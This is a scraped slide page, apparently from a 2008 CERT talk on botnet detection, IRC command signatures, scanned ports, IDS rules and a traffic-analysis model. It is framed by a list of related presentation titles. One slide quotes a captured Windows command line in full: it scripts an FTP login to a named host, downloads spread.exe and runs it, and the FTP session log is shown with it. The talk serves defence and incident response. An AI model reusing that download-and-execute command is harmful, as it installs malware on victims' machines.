China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

Slides:



Advertisements
Similar presentations
Firewall Simulation Teaching Information Security Using: Visualization Tools, Case Studies, and Hands-on Exercises May 23, 2012.
Advertisements

Welcome to SpyEye Front-end interface called “CN 1” or “Main Access Panel.”
Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
FTP Using FileZilla CS10001 – Computer Literacy. Step 1: Understanding the Interface Quickconnect Bar Message Log Area Local site navigation (either lab.
BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.
IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Using FileZilla to FTP CS10001 – Computer Literacy Kent State University.
COEN 252: Computer Forensics Router Investigation.
INTRUSION DETECTION SYSTEMS Tristan Walters Rayce West.
Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Common forms and remedies Neeta Bhadane Raunaq Nilekani Sahasranshu.
Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.
Accessing the Internet with Anonymous FTP Transferring Files from Remote Computers.
FTP Server prepared by Mohammed Ibrahim Programmer Computer & Internet Center Mosul University Presentation.
Botnets An Introduction Into the World of Botnets Tyler Hudak
Introduction to Honeypot, Botnet, and Security Measurement
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
Outline  Infections  1) r57 shell  2) rogue software  What Can We Do?  1) Seccheck  2) Virus total  3) Sandbox  Prevention  1) Personal Software.
B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel
Protecting Mainframe and Distributed Corporate Data from FTP Attacks: Introducing FTP/Security Suite Alessandro Braccia, DBA Sistemi.
Demystifying Backdoor Shells and IRC Bots: The Risk … By : Jonathan.
BotNet Detection Techniques By Shreyas Sali
Malware  Viruses  Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
Simple Mail Transfer Protocol (SMTP)
CERN’s Computer Security Challenge
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Honeypot and Intrusion Detection System
ITIS 1210 Introduction to Web-Based Information Systems Chapter 45 How Hackers can Cripple the Internet and Attack Your PC How Hackers can Cripple the.
Bots Used to Facilitate Spam Matt Ziemniak. Discuss Snort lab improvements Spam as a vehicle behind cyber threats Bots and botnets What can be done.
Vulnerabilities in peer to peer communications Web Security Sravan Kunnuri.
Forensic and Investigative Accounting Chapter 14 Internet Forensics Analysis: Profiling the Cybercriminal © 2005, CCH INCORPORATED 4025 W. Peterson Ave.
FTP Server and FTP Commands By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.
EC-Council Copyright © by EC-Council All Rights reserved. Reproduction is strictly prohibited Security News Source Courtesy:
Attacks On systems And Networks To understand how we can protect our system and network we need to know about what kind of attacks a hacker/cracker would.
A Multifaceted Approach to Understanding the Botnet Phenomenon Authors : Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis Computer Science.
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
Here is a list of viruses Adware- or advertising-supported software-, is any software package which automatically plays, displays, or downloads advertisements.
Botnet behavior and detection October RONOG Silviu Sofronie – a Head of Forensics.
BOTNETS Presented By : Ramesh kumar Ramesh kumar 08EBKIT049 08EBKIT049 A BIGGEST THREAT TO INERNET.
Hacker’s Strategies Revealed WEST CHESTER UNIVERSITY Computer Science Department Yuchen Zhou March 22, 2002.
1 Welcome to CSC 301 Web Programming Charles Frank.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
1 Honeypot, Botnet, Security Measurement, Spam Cliff C. Zou CDA /01/07.
Scanning & Enumeration Lab 3 Once attacker knows who to attack, and knows some of what is there (e.g. DNS servers, mail servers, etc.) the next step is.
Dealing with Malware By: Brandon Payne Image source: TechTips.com.
Produced;: Tartu Kutsehariduskeskus FTP – File Transfer Protocol Maarja Kask ACTION PROGRAMME OF THE EUROPEAN UNION LEONARDO DA VINCI PROJEKT NO.: 2002.
FTP Using FileZilla CS10001 – Computer Literacy. Step 1: Understanding the Interface Quickconnect Bar Message Log Area Local site navigation (either lab.
A Multifaceted Approach to Understanding the Botnet Phenomenon Aurthors: Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis Publication: Internet.
FTP COMMANDS OBJECTIVES. General overview. Introduction to FTP server. Types of FTP users. FTP commands examples. FTP commands in action (example of use).
Website Design:. Once you have created a website on your hard drive you need to get it up on to the Web. This is called "uploading“ or “publishing” or.
BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection Presented by D Callahan.
Firewalls Fighting Spyware, Viruses, and Malware Ch 5.
File Transfer Protocol (FTP) CIS 130. File Transfer Protocol (FTP) Copy files from one internet host (server) to your account on another host –Need domain.
Role Of Network IDS in Network Perimeter Defense.
Speaker: Hom-Jay Hom Date:2009/10/20 Botnet Research Survey Zhaosheng Zhu. et al July 28-August
1 Botnets Group 28: Sean Caulfield and Fredrick Young ECE 4112 Internetwork Security Prof. Henry Owen.
Week-14 (Lecture-1) Malicious software and antivirus: 1. Malware A user can be tricked or forced into downloading malware comes in many forms, Ex. viruses,
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Chapter 40 Internet Security.
Footprinting and Scanning
VIRUS HOAX + BOTS. VIRUS HOAX + BOTS Group Members Aneeqa Ikram Fatima Ishaque Tufail Rana Anwar Amjad.
Intrusion Detection Systems (IDS)
Chapter 4: Protecting the Organization
Intrusion Detection system
Network hardening Chapter 14.
Test 3 review FTP & Cybersecurity
Presentation transcript:

China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC (+86) CANS 2008 Indiana University

China Science & Technology Network Computer Emergency Response Team Agenda About CSTCERT About Botnet Network Security Alert Future work

China Science & Technology Network Computer Emergency Response Team CSTCERT Overview Founded in 2002, CSTCERT(China Science and Technology Network Computer Emergency Response Team) CSTCERT is supervised by CSTNET. Services: –Incidents handling, include: attack,complaints, abnormal traffic detect and other related security incidents –research and development : Emergency Response –Security training : : :

China Science & Technology Network Computer Emergency Response Team Our work ,we have handled 266 security events. –security incidents:205 –security complaints :61

China Science & Technology Network Computer Emergency Response Team Security status is very serious!-why? You can become a hacker very easily! –Know a little knowledge –Search hacker method from Internet –Many people share their hacker tools –If you want to pay some money, someone will teach you about hacker- tech.

China Science & Technology Network Computer Emergency Response Team About Botnet A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. Botnet typically refers to such a system designed and used for illegal purposes. The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'. From:

China Science & Technology Network Computer Emergency Response Team Botnet can cause ? and 。。。

China Science & Technology Network Computer Emergency Response Team How can we find Botnet? Active way: –Network protocol analysis IRC () –monitor some special TCP port(135/139/445/1433/22/2967……) –Check C&C(Command and Control Center) server address update from internet Passive way: –honeypot

China Science & Technology Network Computer Emergency Response Team

Main Character of Botnet IRC message –Port scan:advscan, asc… –File download:download –Others: ping/pong,join,mode… scan tcp port:135/139/445/1433/22/2967 Vulnerability that botnet always exploit –Weak password (ssh/MS-SQL/windows) –Overflow vulnerability(MS- SQL/windows/software)

China Science & Technology Network Computer Emergency Response Team the host was controled by this method-1 Sometimes-use scan control command

China Science & Technology Network Computer Emergency Response Team the host was controled by this method-2 Sometimes-install malware

China Science & Technology Network Computer Emergency Response Team

C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe ftp> open spreadem.nowslate1703.info 21 Connected to spreadem.nowslate1703.info Welcome to Pure-FTPd [TLS] You are user number 73 of 200 allowed. 220-Local time is now 00:15. Server port: IPv6 connections are also welcome on this server. 220 You will be disconnected after 2 minutes of inactivity. ftp> user spread baby 331 User spread OK. Password required 230-User spread has group access to: spread 230 OK. Current restricted directory is / ftp> binary 200 TYPE is now 8-bit binary ftp> get Remote file spread.exe Local file spread.exe 200 PORT command successful 150-Connecting to port kbytes to download 226-File successfully transferred seconds (measured here), Kbytes per second ftp: bytes received in 1.50Seconds 56.70Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 84 kbytes. 221 Logout. C:\Documents and Settings\jackie>

China Science & Technology Network Computer Emergency Response Team Network security alert Network security alert -IDS/IPS rule For port scan:Use some IRC message word:asc/advscan for network comunication with IRC: Ping/Pong,JOIN,PRIVMSG ……

China Science & Technology Network Computer Emergency Response Team Rules for IDS

China Science & Technology Network Computer Emergency Response Team Network security alert Network security alert -Network traffic data analysis We can build a simple mathematics model to describe Network Traffic data by Numerical Analysis method (NTNA model)

China Science & Technology Network Computer Emergency Response Team Data of tcp 1433 scan Data of tcp 22 scan Data of other port scan data of src ip data of counts amounts of target ip Count_1 Count_2 。。。 Count_n Count_1 Count_2 。。。 Count_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Src_ip1 Src_ip2 。。。 Src_ipn Src_ip1 Src_ip2 。。。 Src_ipn

China Science & Technology Network Computer Emergency Response Team NTNA model in practice

China Science & Technology Network Computer Emergency Response Team Future work Botnet research Monitoring and countermeasure for large-scale network worm Some improvement for the NTNA model –accuracy amendment –Extension to larger scale network traffic data (netflow) –Data mining

China Science & Technology Network Computer Emergency Response Team Thank you! (+86)